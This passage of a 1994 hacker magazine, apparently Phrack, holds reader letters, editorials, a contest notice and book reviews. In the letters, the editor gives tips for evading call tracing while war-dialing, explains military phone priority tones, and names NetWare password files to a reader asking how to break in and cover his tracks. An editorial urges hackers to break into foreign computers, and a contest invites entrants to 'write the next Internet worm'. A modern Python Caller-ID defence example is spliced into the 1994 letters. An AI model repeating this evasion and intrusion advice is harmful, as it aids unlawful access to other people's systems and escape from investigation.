for the ASC and has just finished directing a short film for USC 
Teleproductions. 


Douglas Rushkoff - Cyber Consultant/Author
Douglas is the author of the best selling Harper Collins San Francisco novel,
Cyberia. He spent two years of his life living among the key players in the 
cyber universe. Douglas knows the New Edge well and is providing us with the 
map to its points of interest, rest stops and travelers. 


For more information, please contact:
Todd LeValley, Producer
Belief Productions
(310) 545-8138
belief@eworld.com


[Dear New Edge:


You have got to be kidding me. "Readers of Wired and Mondo 2000 will
naturally latch on to this electronic presentation of their favorite
topics?"
Aren’t we awful fucking high on ourselves? Christ. Mondo & Wired
readers and writers (and stars) are themselves so fucking far removed
from the real meat of the underground, that they wouldn’t
even be able to relate to it. Obviously this "documentary"
is going to be aimed at the wannabes who sit at home furiously
masturbating to "Cyborgasm" while installing FRACTINT, being very
careful not to soil their copy of "The Hacker Crackdown." Oh joy.


These guys are so fucking out of it, they sent me two letters.
One addressed to Phrack, the other to Phrack / Emmanuel Goldstein.
Maybe they think we’re 2600.


CYBER-COUNT: 12 occurrences. 


That’s kind of low. I’m surprised your public relations people didn’t 
have you add in a few more cyber-this’s or cyber-that’s into the 
blurb. Gotta keep that cyber-count high if you want to get those 
digi-bucks out of those cyberians! CYBER!!! 


Read my review of Cyberia guys...find a new pop-fad to 
milk for cash. ] 


In less than 3 weeks, I will be leaving for Basic Training. Once out of
here, I will be working on Satellite Data Transmissions for the US
Army. I am highly excited, just waiting to see what type of computers
I will be working on. Anyways, I will be enrolled in a 32-week
accelerated technical class teaching me all about satellites, and
the computers that I will be using. Here’s the kick. I’ll be writing
a series of Tech Journals detailing the workings/operations of/weaknesses,
and the use of the systems. I was wondering if you would be interested
in carrying these. I’ve read Phrack for a long time, but it is an off
the wall subject. I’ll also be playing with the military phone system,
in hopes of finding out what the ABCD tones do. (I heard from a file
that Military phones utilize them but I’m still a civilian, and am
clueless).


Thanks for keeping me informed
alisti!


[Sorry to hear about your impending Basic Training. I’m not big on
the military, as they would make me chop off all my hair.


About the Satellite systems: YES If you do indeed find time to write 
up any files on how they work, systems involved, weaknesses, etc. 
I’D LOVE TO PRINT THAT! Just make sure you don’t blow your clearance. 


Satellites are very cool. I’m about to buy a Ku Band dish to do some
packet radio type stuff. A bit low-tech compared to the Army, but hell, 
I’m on a budget. 


ABCD...they are used for prioritizing calls on AUTOVON. FTS doesn’t 
use them (I think), and they can only be used on certain lines. 


They are:

A = priority
B = priority override
C = flash
D = flash override


For instance, if you want to make it known that this is an important
call, you hit the "a" button before dialing. It establishes a
priority-class call, which may cause a light to come on or something
as equally attention grabbing at the called party’s end. Priority
calls cannot be interrupted, except by a "Priority Override" etc,
with Flash Override being the highest class.


If you do these from an improper line, you will get an error message. 
The one I used to get when BS’ing AUTOVON op’s long ago 
was "The President’s use of this line is not authorized." Funny. 


Let me know if any of this is still valid.] 


Dear Phrack, 

The following is a copy of a Toneloc found file my friend got. As happens
to my friend a lot the numbers aren’t valid. But, you’ll see he found at least
one System 75. It appears that the 75 had a tracer installed on it already.
My friend did not get a call back on it, and nothing has been done as far
as we know. But, I still wonder -- Is scanning no longer safe?


Castor [612] 


56X-XXXX 22:57:34 03-Apr-94 C CONNECT 1200


Login: b 
Password: 
INCORRECT LOGIN 


Login: c 
Password: 
INCORRECT LOGIN 


56X-XXXX 23:04:12 03-Apr-94 C CONNECT 1200 


Unknown command error 


Unknown command error 


Unknown command error 


Unknown command error 
Ready 


56X-XXXX 23:49:19 03-Apr-94 C CONNECT 1200 


KEYBOARD LOCKED, WAIT FOR LOGIN 
[1;24r [1;1H [0J 


Login: b 
Password: 
INCORRECT LOGIN 


56X-XXXX 01:23:28 04-Apr-94 C CONNECT 1200 


Login: b 
Password: 
INCORRECT LOGIN 


Call traced to 612-XXX-XXXX.
Saving number in security log for further investigation. 


[Jeez. That sure does suck.
Well, live and learn kiddoes. 1994 is not the time to be hacking
by direct dialing local numbers. It’s just not all that smart.


Caller-ID has been tariffed in a lot of RBOCS. A lot of modem
manufacturers implemented caller-id features into their equipment.
Having these features in the equipment means that it won’t be long
before people redesign all their login programs to make use of
these features. I would.


I’ve got an ISDN line. Every time I call out, the SPID (phone number)
of the B channel I’m using is broadcast. There is nothing I can do
about that. On a remote connection, almost all decent ISDN terminal
adaptors have the option to block any SPID they don’t know. They won’t
even answer the phone, because they receive and interpret the phone
number before any session is established.


Yeah, well, that’s ISDN, but it will not take a genius to do a few 
quick hacks on some linux box and we will suddenly be inundated with all 
kinds of "security packages" that use modems with Caller-ID. 


Yeah, I know, *67 (or whatever it is) to block the data, or
route the call through another carrier so the data won’t get passed
(10288-NXX-XXXX). The data is still in the system, just not being
transmitted from the switch out to the party being called.


It amazes me how many really smart people I know have been busted 
solely because they were hacking local systems and calling them 
directly. 


Scanning has always been a very tricky subject. Since you are paying
for a phone line, and if you have flat-rate service, you are
thereby entitled to call as many numbers as you want. The big issue
a while back was dialing sequentially (which set some telcos on a rampage
because call usage patterns looked like telemarketing machines).
The other problem is harassment. One call to an individual is a wrong
number. Two is bordering on harassment. So, doing a complete scan
and calling the carriers back through some other method would be
a fairly good idea. And always have your calls forwarded to a
non-working number so the 5,000 assholes who call-return you
during the scan won’t interfere.


If you are lucky enough to live in the boonies, you are probably
still somewhat safe, but everyone else...be careful. ]
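

The reply above predicts login programs that use Caller-ID and describes ISDN adaptors that refuse unknown numbers before any session starts. The sketch below is an added example, not code from Phrack or any vendor, showing that answer-or-ignore decision from the line owner's side. It assumes the modem prints the "DATE = / TIME = / NMBR =" formatted Caller-ID report (NMBR = P for a withheld number, O for out of area); the allow-list, lockout threshold, class and function names and all phone numbers are constructed for illustration.

```python
# Added example: answer-or-ignore decision for a dial-in line using Caller-ID.
# All numbers, dates and the allow-list below are constructed sample data.
from collections import defaultdict

ALLOWED_CALLERS = {"6125550101", "6125550102"}   # hypothetical known users
MAX_FAILED_LOGINS = 3                            # hypothetical lockout threshold


def parse_cid_report(lines):
    """Turn 'KEY = VALUE' lines from a modem's Caller-ID report into a dict."""
    report = {}
    for line in lines:
        key, sep, value = line.partition("=")
        if sep:
            report[key.strip().upper()] = value.strip()
    return report


def classify_caller(report):
    """Return (kind, number); kind is 'number', 'blocked', 'out_of_area' or 'missing'."""
    raw = report.get("NMBR", "").upper()
    if raw == "P":            # caller withheld the number (e.g. *67)
        return "blocked", None
    if raw == "O":            # network did not deliver a number
        return "out_of_area", None
    digits = "".join(ch for ch in raw if ch.isdigit())
    if len(digits) == 11 and digits.startswith("1"):
        digits = digits[1:]   # drop a leading long-distance 1
    if len(digits) != 10:
        return "missing", None
    return "number", digits


class DialInGate:
    """Decides, before the modem answers, whether a ringing call gets a login prompt."""

    def __init__(self, allowed):
        self.allowed = set(allowed)
        self.failures = defaultdict(int)
        self.security_log = []        # (timestamp, caller, event) tuples

    def on_ring(self, cid_lines):
        report = parse_cid_report(cid_lines)
        stamp = f"{report.get('DATE', '????')} {report.get('TIME', '????')}"
        kind, number = classify_caller(report)
        if kind != "number":
            # No usable number: never answer, but keep a record of the attempt.
            self.security_log.append((stamp, kind, "not answered"))
            return "ignore"
        if number not in self.allowed:
            self.security_log.append((stamp, number, "unknown caller, not answered"))
            return "ignore"
        if self.failures[number] >= MAX_FAILED_LOGINS:
            self.security_log.append((stamp, number, "locked out, not answered"))
            return "ignore"
        return "answer"

    def on_login_result(self, stamp, number, ok):
        """Record the outcome of a login attempt made on an answered call."""
        if ok:
            self.failures.pop(number, None)
            return
        self.failures[number] += 1
        self.security_log.append((stamp, number, "incorrect login"))


def demo():
    """Run four constructed calls through the gate; return decisions and the log."""
    gate = DialInGate(ALLOWED_CALLERS)
    calls = [
        ["DATE = 0403", "TIME = 2257", "NMBR = 6125550101"],   # known user
        ["DATE = 0403", "TIME = 2304", "NMBR = P"],            # number withheld
        ["DATE = 0403", "TIME = 2349", "NMBR = 6125550199"],   # not on the list
    ]
    decisions = [gate.on_ring(c) for c in calls]
    for _ in range(MAX_FAILED_LOGINS):
        gate.on_login_result("0404 0123", "6125550101", ok=False)
    decisions.append(gate.on_ring(["DATE = 0404", "TIME = 0125", "NMBR = 6125550101"]))
    return decisions, gate.security_log


if __name__ == "__main__":
    decisions, log = demo()
    print(decisions)
    for entry in log:
        print(*entry)
```

A withheld number is treated the same as an unknown one: the call is never answered, so the caller never sees a login prompt, and the attempt still lands in the security log.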


Phrack--


I was wondering if anyone has ever done an article on breaking 
Novell Network through a workstation. I’ve heard it can be done through 
the SysAdmin computer, but is there a way to find the userlist and 
passwords? Also how would I go about cleaning up after myself so as to 
not leave a trace on the logs. I would appreciate a way other than screen 
capture, but if anyone knows of a good boot record booting program to 
do a capture of every key typed that would be great, and maybe it 
could be uuencoded in the next Phrack! 


Thanks again for making the best, ass kickin’, a step above the 
rest, brain moving, earth shaking, body shivering, fist shaking, totally 
bitchin’, muy excelente, awesome H/P magazine in the whole world! :) 


Sincerely, 


The Warden


[Thanks for the compliments...


About your question though, I’m not quite sure what you mean.
In a NetWare environment there really isn’t any userlist and passwords
that you can get at. You can run the syscon utility and look at all the
usernames, but not much more. The passwords are stored in what’s known
as the "bindery." These are 3 files in the sys/system directory
called NET$OBJ.SYS, NET$VAL.SYS, and NET$PROP.SYS. If you can
pull a password out of those files, I will shit in my hat and eat it.


Beyond that, yes, a key-capture program is definitely the ideal
solution for monitoring activity on a PC workstation. There is
one in this issue.]


Hi, 

I’ve been reading your magazine for a long time now, my eyes light up when
I see an advert for a UK BBS with related hacking/phreaking articles or files
on it, but when I try to ring them they are usually gone.
I’ve been searching for ages for BBS’s in the UK with these kind of articles
on them but I’ve had no luck. Even postings on the USENET had little results.
I have had a few boards which are shady but they ask unusual questions about
abiding to rules/laws about hacking then they prompt with fake login and
registration schemes.


If you have some, could you possibly send or publish a list of shady UK BBS’s?
I’d be extremely grateful.


Cheers, 

Steven 

[Steven:

Hell, I don’t even know the numbers to any "Shady" bulletin boards here
in America. The only UK hacker bbs I knew of in recent years was
Unauthorised Access, but I’m sure that’s the advert you are referring to.


Maybe someone else in the UK knows something decent to call over there.
Any takers? ]


[THE GRADY FILES] 


Many of you may remember the NSA Security Manual we published last 
issue. That single file generated more press and hype than I’d 
seen in a long time. It was mentioned in several newspapers, it 
appeared on television. It was ridiculous. The document is 
available to anyone who can fill out a FOIA request.


Regardless, people went zany. At first I couldn’t figure out
why everyone was so worked up, and then I caught wind of Grady
Ward. Grady had posted the document to the net (with all mention
of Phrack deleted from it) in several USENET forums alt.politics.org.nsa,
talk.politics.crypto and comp.org.eff.talk. Several readers of
Phrack were quick to jump up and point out that Grady had obtained
it from the magazine (thanks guys!) which he grudgingly admitted.
Grady got to be in the spotlight for a while as the Phrack/NSA Handbook
thread continued to grow.


In the meantime, Grady was either calling, or giving him the
benefit of the doubt, getting called by an awful lot of press.
And even more compelling is the way he’d begun pronouncing my
impending federal raid on so many newsgroups.


And of course, I don’t have time to read any of that USENET crap
so I’m oblivious to all of this. Then I got a message from Grady.


[GRADY WRITES]


You might want to get ready for the FBI 
serving a warrant on you for information 
about the NSA security employee manual 
published in Phrack 45; 
the NSA security people called me about 10 minutes 
ago to talk about how it got on the net. 


I being very cooperative, gave him 
your address in Austin. 


Grady 
707-826-7715 


[I REPLY] 


Get a grip. 


Nothing that was contained in that file could not 
be obtained through other sources. 


[GRADY REPLIES] 


Just because you did nothing illegal, doesn’t mean that 
you won’t be annoyed by the FBI. Generally they will 
be very polite however. 


Gripping. Now what? 


[I REPLY] 


Ok, 


If someone actually did contact you, what was his name and number. 
I will forward that to my lawyer. 


[GRADY REPLIES] 


I have received your mail regarding "Re: NSA" 
It will be read immediately when I return. 


If you are seeking more information on the 
Moby lexical databases, please run 


finger grady@netcom.com 


for general information or help downloading 
live samples and a postscript version of our 
current brochure via anonymous ftp. 


Thanks - Grady Ward 


He never answered my mail. 


Dear Sir: 


Please refrain from sending such material to this address in the future!
Since this address has been unsubscribed from the Phrack mailing list,
it means that further mailings are undesirable.


I would also wish to remind you that maintaining lists of people’s email
without consent is quite immoral and devious. How hypocritical of
you, who decry all such behavior when it is practiced by corporations
or governments.


Thank you. 
robbie@mundoe.maths.mu.oz.au 


[PHRACK EDITOR ABUSES POWER: 


Dear Sir: 


Please excuse the mailing. Have you ever heard of a mistake?
Have you ever heard of an oversight? 


Is it really that much of an inconvenience for you to hit the "d" key 
to remove one small piece of unwanted mail? 


This being said, I would also like to invite you to go fuck yourself. 


** I guess this guy does not like to get unsolicited mail **] 


You people really piss me off! You’re undermining the fun and 
enjoyment of the rest of the internet users just for your juvenile 
games and illegal activities. Do you realize how much better off we’d 
be if you all just went away and left the Net to honest people like me? 
There is no place in today’s society for a bunch of maladjusted 
paranoid psychotics like yourselves. Please do all of us users a favor 
and go jump in a river. 


Kevin Barnes 
kebar@netcom.com 


[ABUSE OF POWER CONTINUES...WILL ERIKB EVER STOP?


Hey Keith: 
Thanks a lot for the letter! 


You know, it does my heart good to hear from such kind and caring
folks like yourself. It’s so fortunate for the Internet that there are
people like yourself who take it upon themselves to become martyrs for
their causes and express their ideals in such an intelligent manner.


It’s fascinating to me that you can send such email sight-unseen. 
Do you know who you are writing to? Do you even have the slightest 
idea? What do you hope to accomplish? Do you have any idea? 


This particular "maladjusted paranoid psychotic" to whom you have so 
eloquently addressed is an engineer in the R&D of a Fortune 500 computer 
company, and that along with outside consulting will net me about 
six-figures this tax year. I’ve consulted for telephone companies, 
governments, aerospace, financial institutions, oil companies (the list 
goes on...) and quite frankly I don’t do anything even remotely illegal. 
In fact, one recent and quite prominent quote from me was "I only
hack for money."


Now, about the silent majority of "honest people" like yourself that you
have so self-righteously chosen to represent...


I’ve been using the net since the early 80’s (arpa-days) initially
through a rms granted guest account on MIT-OZ. I’ve continued to
work with other Internet Providers to cover the asses of the so-called
"honest people" of which you include yourself.


Now, in my view, if it were not for people like us, who consistently
expose and pinpoint weaknesses in the operating systems and networking
technologies that you use for your "fun and enjoyment" and that I use
for MY JOB, you would continue to be at serious risk. But, perhaps
ignorance is truly bliss, and if so, then Keith, you are probably one of
the happiest people on this fine planet.


Now, per your request, I may just go jump in a river, as the one near 
my house is quite nice, and it is almost 100 degrees here in Texas. 
I only ask that you do me one small favor: 


print out 500 copies of this letter, roll them up into a paper fist, 
and shove them into any orifice on your person that meets your criteria 
as deserving. 


** I guess this guy doesn’t like me...or you ** 


EDITORIAL ABUSE ENDS] 


==Phrack Magazine== 
Phrack Editorial


If you aren’t from America, this editorial really isn’t meant for you, 
so read on with warning, or go on to the next file. 


Stupid hackers. 
We’ve got to do something to clean up our image. 


We truly are "America’s Most Valuable Resource," as ex-CIA spook Robert
Steele has said so many times. But if we don’t stop screwing over our own
countrymen, we will never be looked at as anything more than common
gutter trash. Hacking computers for the sole purpose of collecting
systems like space-age baseball cards is stupid, pointless and can only
lead to a quick trip up the river.


Obviously, no one is going to stop hacking. I’ve been lucky in that I’ve
found people willing to pay me to hack for them rather than against
them, but not everyone can score such a coup. What kind of alternative
can the rest of the community have?


Let’s say that everyone was given an opportunity to hack without any
worry of prosecution with free access to a safe system to hack from,
with the only catch being that you could not hack certain systems.
Military, government, financial, commercial and university systems would
all still be fair game. Every operating system, every application, every
network type all open to your curious minds.


Would this be a good alternative? Could you follow a few simple 
guidelines for the offer of virtually unlimited hacking with no worry of 
governmental interference? 


Where am I going with this? 


Right now we are at war. You may not realize it, but we all feel the 
implications of this war, because it’s a war with no allies, and 
enormous stakes. It’s a war of economics. 


The very countries that shake our hands over the conference tables of
NATO and the United Nations are picking our pockets. Whether it be the
blatant theft of American R&D by Japanese firms, or the clandestine and
governmentally-sanctioned bugging of Air France first-class seating, or
the cloak-and-dagger hacking of the SWIFT network by the German BND’s
Project Rahab, America is getting fucked.


Every country on the planet is coming at us. Let’s face it, we are the
leaders in everything. Period. Every important discovery in this
century has been by an American or by an American company. Certainly
other countries have better profited by our discoveries, but
nonetheless, we are the world’s think-tank.


So, is it fair that we keep getting shafted by these so-called "allies?" 
Is it fair that we sit idly by, like some old hound too lazy to scratch 
at the ticks sucking out our life’s blood by the gallon? Hell no. 


Let’s say that an enterprising group of computer hackers decided to 
strike back. Using equipment bought legally, using network connections 
obtained and paid for legally, and making sure that all usage was 
tracked and paid for, this same group began a systematic attack of 
foreign computers. Then, upon having gained access, gave any and all 
information obtained to American corporations and the Federal 
government. 


What laws would be broken? Federal Computer Crime Statutes specifically
target so-called "Federal Interest Computers." (ie: banks,
telecommunications, military, etc.) Since these attacks would involve
foreign systems, those statutes would not apply. If all calls and
network connections were promptly paid for, no toll-fraud or other
communications related laws would apply.


International law is so muddled that the chances of getting extradited
by a country like France for breaking into systems in Paris from Albuquerque
are slim at best. Even more slim when factoring in that the information
gained was given to the CIA and American corporations.


Every hacking case involving international breakins has been tried and
convicted based on other crimes. Although the media may spray headlines
like "Dutch Hackers Invade Internet" or "German Hackers Raid NASA,"
those hackers were tried for breaking into systems within THEIR OWN
COUNTRIES...not somewhere else. 8lgm in England got press for hacking
world-wide, but got nailed hacking locally. Australia’s Realm Hackers:
Phoenix, Electron & Nom hacked almost exclusively other countries, but
use of AT&T calling cards rather than Australian Telecom got them a charge
of defrauding the Australian government. Dutch hacker RGB got huge press
hacking a US military site and creating a "dquayle" account, but got
nailed while hacking a local university. The list goes on and on.


I asked several people about the workability of my proposal. Most
seemed to concur that it was highly unlikely that anyone would have to
fear any action by American law enforcement, or of extradition to
foreign soil to face charges there. The most likely form of retribution
would be eradication by agents of that government. (Can you say,
"Hagbard?")


Well, I’m willing to take that chance, but only after I get further 
information from as many different sources as I can. I’m not looking 
for anyone to condone these actions, nor to finance them. I’m only 
interested in any possible legal action that may interfere with my 
freedom. 


I’m drafting a letter that will be sent to as many different people as
possible to gather a fully-formed opinion on the possible legal
ramifications of such an undertaking. The letter will be sent to the FBI,
SS, CIA, NSA, NRO, Joint Chiefs, National Security Council, Congress,
Armed Forces, members of local and state police forces, lawyers, professors,
security professionals, and anyone else I can think of. Their answers
will help fully form my decision, and perhaps if I pass along their
answers, will help influence other American hackers.


We must take the offensive, and attack the electronic borders of other
countries as vigorously as they attack us, if not more so. This is
indeed a war, and America must not lose.


->Erik Bloodaxe...Hacker...American.


Ok, so maybe that was a bit much. But any excuse to hack without fear 
should be reason enough to exert a bit of Nationalism. 


I’d much rather be taken out by the French in some covert operation and 
go out a martyr, than catch AIDS after being raped by the Texas 
Syndicate in the metal shop of some Federal Prison. Wouldn’t you? 
PART I
!! NEW PHRACK CONTEST !! 


Phrack Magazine is sponsoring a programming contest open to anyone 
who wishes to enter. 


Write the Next Internet Worm! Write the world’s best X Windows wardialer! 
Code something that makes COPS & SATAN look like high school Introduction 
to Computing assignments. Make the OKI 1150 a scanning, tracking, vampire- 
phone. Write an NLM! Write a TSR! Write a stupid game! It doesn’t 
matter what you write, or what computer it’s for! It only matters that you 
enter! 


Win from the following prizes:


Computer Hardware & Peripherals
System Software
Complete Compiler packages
CD-ROMS
T-Shirts
Magazine Subscriptions
and MANY MORE!


STOP CRACKING PASSWORDS AND DO SOMETHING WITH YOUR LIFE!


Enter the PHRACK PROGRAMMING CONTEST! 

The rules are very simple: 

1) All programs must be original works. No submissions of 
previously copyrighted materials or works prepared by 
third parties will be judged. 

2) All entries must be sent in as source code only. Any programming 
language is acceptable. Programs must compile and run without 
any modifications needed by the judges. If programs are specific 
to certain platforms, please designate that platform. If special 
hardware is needed, please specify what hardware is required.
If include libraries are needed, they should be submitted in addition
to the main program.

3) No virii accepted. An exception may be made for such programs that 
are developed for operating systems other than AMIGA/Dos, System 7, 
MS-DOS (or variants), or OS/2. Suitable exceptions could be, but are not 
limited to, UNIX (any variant), VMS or MVS. 

4) Entries may be submitted via email or magnetic media. Email should be
directed to phrack@well.com. Tapes, Diskettes or other storage
media should be sent to


Phrack Magazine
603 W. 13th #1A-278
Austin, TX 78701


5) Programs will be judged by a panel of judges based on programming skill
displayed, originality, usability, user interface, documentation,
and creativity.


6) Phrack Magazine will make no claims to the works submitted, and the 
rights to the software are understood to be retained by the program 
author. However, by entering, the Author thereby grants Phrack Magazine 
permission to reprint the program source code in future issues. 


7) All Entries must be received by 12-31-94. Prizes to be awarded by 3-1-95. 


INCLUDE THIS FORM WITH ENTRY


Author:


Email Address:


Mailing Address:


Program Name:


Description:


Hardware & Software Platform(s) Developed For:


Special Equipment Needed (modem, ethernet cards, sound cards, etc):


Other Comments:


COMPUTER COP PROPHILE
FOLLOW-UP REPORT


LT. WILLIAM BAKER
JEFFERSON COUNTY POLICE


by


The Grimmace


In PHRACK 43, I wrote an article on the life and times
of a computer cop operating out of the Jefferson County Police
Department in Louisville, Kentucky. In the article, I included
a transcript of a taped interview with him that I did after
socially engineering my way through the cop-bureaucracy in his
department. At the time I thought it was a hell of an idea and a
lot of PHRACK readers probably got a good insight into how the
"other side" thinks.


However, I made the terminal mistake of underestimating
the people I was dealing with by a LONG shot and felt that I
should write a short follow-up on what has transpired since that
article was published in PHRACK 43.


A lot of the stuff in the article about Lt. Baker was
obtained by an attorney I know who has no reason to be friendly
to the cops. He helped me get copies of court transcripts which
included tons of information on Baker’s training and areas of
expertise. Since the article, the attorney has refused to talk
to me and, it appears, that he’s been identified as the source
of assistance in the article and all he will say to me is that
"I don’t want any more trouble from that guy...forget where you
left my phone number." Interesting...no elaboration...hang up.


As I recall, the PHRACK 43 issue came out around
November 17th. On November 20th, I received a telephone call
where I was living at the home of a friend of mine from Lt. 
Baker who laughingly asked me if I needed any more information 
for any "future articles". I tried the "I don’t know what 
you’re talking about" scam at which time he read to me my full 
name, date of birth, social security number, employer, license 
number of my car, and the serial number from a bicycle I just 
purchased the day before. I figured that he’d run a credit 
history on me, but when I checked, there had been no inquiries 
on my accounts for a year. He told me the last 3 jobs I’d held 
and where I bought my groceries and recited a list of BBSs I was 
on (two of which under aliases other than The Grimmace). 


This guy had a way about him that made a chill run up my
spine and never once said the first threatening or abusive thing
to me. I suppose I figured that the cops were all idiots and 
that I’d never hear anything more about the article and go on to 
write some more about other computer cops using the same method. 
I’ve now decided against it. 


I got the message...and the message was "You aren’t the
only one who can hack out information." I’d always expected to
get the typical "cop treatment" if I ever got caught doing
anything, but I think this was worse. Hell, I never know where
the guy’s gonna show up next. I’ve received cryptic messages on
the IRC from a variety of accounts and servers all over the
country and on various "private" BBSs and got one on my birthday
on my Internet account...it traced back to an anonymous server
somewhere in the bowels of UCLA. I don’t know anyone at UCLA
and the internet account I have is an anonymous account actually
owned by another friend of mine.


I think the point I’m trying to make is that all of us 
have to be aware of how the cops think in order to protect 
ourselves and the things we believe in. But...shaking the 
hornet’s nest in order to see what comes out maybe isn’t the 
coolest way to investigate. 


Like I wrote in my previous article, we’ve all gotten a 
big laugh from keystone cops like Foley and Golden, but things 
may be changing. Local and federal agencies are beginning to 
cooperate on a regular basis and international agencies are also 
beginning to join the party. 


The big push to eradicate child-pornography has led to a number of
hackers being caught in the search for the "dirty old men" on the Internet.
Baker was the Kentucky cop who was singularly responsible for the bust of the
big kiddie-porn FSP site at the University of Birmingham in England back
in April and got a lot of press coverage about it. But I had personally
never considered that a cop could hack his way into a password-protected
FSP site. And why would he care about something happening on the other
side of the world? Hackers do it, but not cops...unless the cops are
hackers. Hmmm...theories anyone?


I don’t live in Louisville anymore...not because of
Baker, but because of some other problems, but I still look over
my shoulder. It would be easier if the guy was a prick, but I’m
more paranoid of the friendly good-ole boy than the raving
lunatic breaking in our front doors with a sledge hammer. I
always thought we were safe because we knew so much more than
the people chasing us. I’m not so certain of that anymore.


So that’s it. I made the mistakes of 1) probably 
embarrassing a guy who I thought would never be able to touch me 
and 2), drawing attention to myself. A hacker’s primary 
protection lies in his anonymity...those who live the high 
profiles are the ones who take the falls and, although I haven’t 
fallen yet, I keep having the feeling that I’m standing on the 
edge and that I know the guy sneaking up behind me. 


From the shadows--
The Grimmace
[HsL - RAt - UQQ]


!! PHRACK READS !! 


"Cyberia" by Douglas Rushkoff 
Review by Erik Bloodaxe 


Imagine a book about drugs written by someone who never inhaled.
Imagine a book about raves written by someone who saw a flyer once.
Imagine a book about computers by someone who thinks
a Macintosh is complex.


Imagine an author trying to make a quick buck by writing about something 
his publisher said was hot and would sell. 


And there you have Cyberia, by Douglas Rushkoff. 


I have got to hand it to this amazing huckster Rushkoff, though. By 
publishing Cyberia, and simultaneously putting out "The Gen X Reader," 
(which by the way is unequaled in its insipidness), he has covered all 
bases for the idiot masses to devour at the local bookseller. 


Rushkoff has taken it upon himself to coin new terms such as 
"Cyberia," the electronic world we live in; "Cyberians," the people 
who live and play online; etc... 


Like we needed more buzzwords to add to a world full of "Infobahns,"
"console cowboys," and "phrackers." Pardon me while I puke.


The "interviews" with various denizens of Rushkoff’s "Cyberia" come off 
as fake as if I were to attempt to publish an interview with Mao Tse Tung 
in the next issue of Phrack. 


We’ve got ravers talking on and on about "E" and having deep conversations
about smart drugs and quantum physics. Let’s see: in the dozens of raves
I’ve been to in several states the deepest conversation that popped
up was "uh, do you have any more of that acid?" and "this mix is cool."
And these conversations were from the more eloquent of the nearly all under
21 crowd that the events attracted. Far from quantum physicians.

And beyond that, it’s been "ecstasy" or "X" in every drug culture I’ve wandered
through since I walked up the bar of Maggie Mae’s on Austin, Texas’ 6th Street 
in the early 80’s with my fake id and bought a pouch of the magic elixir over 
the counter from the bartender (complete with printed instructions). 

NOT "E." But that’s just nit-picking. 




Now we have the psychedelic crowd. Listening to the "Interviews" of these
jokers reminds me of a Cheech and Chong routine involving Sergeant Stedanko.
"Some individuals who have smoked Mary Jane, or Reefer ofttimes turn to
harder drugs such as LSD." That’s not a quote from the book, but it may
as well be. People constantly talk about "LSD-this" and "LSD-that."
Hell, if someone walked into a room and went on about how he enjoyed his
last "LSD experience" the way these people do, you’d think they were
really really stupid, or just a cop. "Why no, we’ve never had any of
that acid stuff. Is it like LSD?" Please.


Then there are the DMT fruitcakes. Boys and girls, DMT isn’t being sold
on the street corner in Boise. In fact, I think it would be easier for most
people to get a portable rocket launcher than DMT. Nevertheless, in every
fucking piece of tripe published about the "new psychedelia" DMT is
splattered all over it. Just because Terence Fucking McKenna
saw little pod people, does not mean it serves any high position
in the online community.


And Hackers? Oh fuck me gently with a chainsaw, Douglas. From Craig Neidorf’s
hacker Epiphany while playing Adventure on his Atari VCS to Gail
Thackeray’s tearful midnight phonecall to Rushkoff when Phiber Optik
was raided for the 3rd time. PLEASE! I’m sure Gail was up to her eyebrows
in bourbon, wearing a party hat and prank calling hackers saying "You’re next,
my little pretty!" Not looking for 3rd-rate schlock journalists to whine to.
The Smart Drink Girl? The Mondo House? Gee...how Cyber. Thanks, but
no thanks.


I honestly don’t know if Rushkoff really experienced any of this nonsense,
or if he actually stumbled on a few DMT crystals and smoked this
reality. Let’s just say, I think Mr. Rushkoff was absent the day
his professor discussed "Creative License in Journalism" and just decided
to wing it.


Actually, maybe San Francisco really is like this. But NOWHERE else on 
the planet can relate. And shit, if I wanted to read a GOOD San 
Francisco book, I’d reread Armistead Maupin’s "Tales of the City." 

This book should have been called "Everything I Needed to Know About 
Cyber-Culture I Learned in Mondo-2000." 


Seriously...anyone who reads this book and finds anything remotely 
close to the reality of the various scenes it weakly attempts to 
cover needs to email me immediately. I have wiped my ass with 
better pulp. 


BOOK REVIEW: INFORMATION WARFARE 
CHAOS ON THE ELECTRONIC SUPERHIGHWAY 
By Winn Schwartau 


INFORMATION WARFARE - CHAOS ON THE ELECTRONIC SUPERHIGHWAY

By Winn Schwartau. (C)opyright 1994 by the author 

Thunder’s Mouth Press, 632 Broadway / 7th floor / New York, NY 10012 

ISBN 1-56025-080-1 Price $22.95 

Distributed by Publishers Group West, 4065 Hollis St. / Emeryville, CA 94608 
(800) 788-3123 

Review by Scott Davis (dfox@fennec.com)
(from tjoauc1-4 ftp: freeside.com /pub/tjoauc)


If you only buy one book this year, make sure it is INFORMATION WARFARE!
In my 10+ years of existing in cyberspace and seeing people and organizations
debate, argue and contemplate security issues, laws, personal privacy,
and solutions to all of these issues...and more, never have I seen a more
definitive publication. In INFORMATION WARFARE, Winn Schwartau simply
draws the line on the debating. The information in this book is hard-core,
factual documentation that leaves no doubt in this reader’s mind that
the world is in for a long, hard ride in regards to computer security.
The United States is open to the world’s electronic terrorists.
When you finish reading this book, you will find out just how open we are.


Mr. Schwartau talks about industrial espionage, hacking, viruses,
eavesdropping, code-breaking, personal privacy, HERF guns, EMP/T bombs,
magnetic weaponry, and the newest phrase of our generation...
"Binary Schizophrenia". He exposes these topics from all angles. If you
spend any amount of time in Cyberspace, this book is for you.


How much do you depend on technology?


ATM machines, credit cards, toasters, VCR’s, televisions, computers,
telephones, modems...the list goes on. You use technology and computers
and don’t even know it! But the point is...just how safe are you from
invasion? How safe are our country’s secrets? The fact is - they are NOT
SAFE! How easy is it for someone you don’t know to track your every move
on a daily basis? VERY EASY! Are you a potential victim to fraud,
breach of privacy, or general infractions against the way you carry
on your daily activities? YES! ...and you’d never guess how vulnerable
we all are!


This book will take you deep into places the government refuses to 
acknowledge. You should know about INFORMATION WARFARE. Order your 
copy today, or pick it up at your favorite book store. You will not 
regret it. 


_Firewalls and Internet Security: Repelling the Wily Hacker_ 


William R. Cheswick <ches@research.att.com> 
Steven M. Bellovin <smb@research.att.com> 


Addison-Wesley, ISBN 0-201-63357-4 
306 + XIV = 320 pages 
(Printed on recycled paper) 


A-Somewhat-Less-Enthusiastic-Review


Reviewed by Herd Beast 


The back of this book claims that, "_Firewalls and Internet Security_ 
gives you invaluable advice and practical tools for protecting your 
organization’s computers from the very real threat of hacker attacks." 
That is true. The authors also add something from their knowledge of 
these hacker attacks. The book can be roughly separated into two 
parts: Firewalls, and, you guessed it: Internet Security. That is
how I see it. The book itself is divided into four parts (Getting
Started, Building Your Own Firewall, A Look Back & Odds and Ends), 
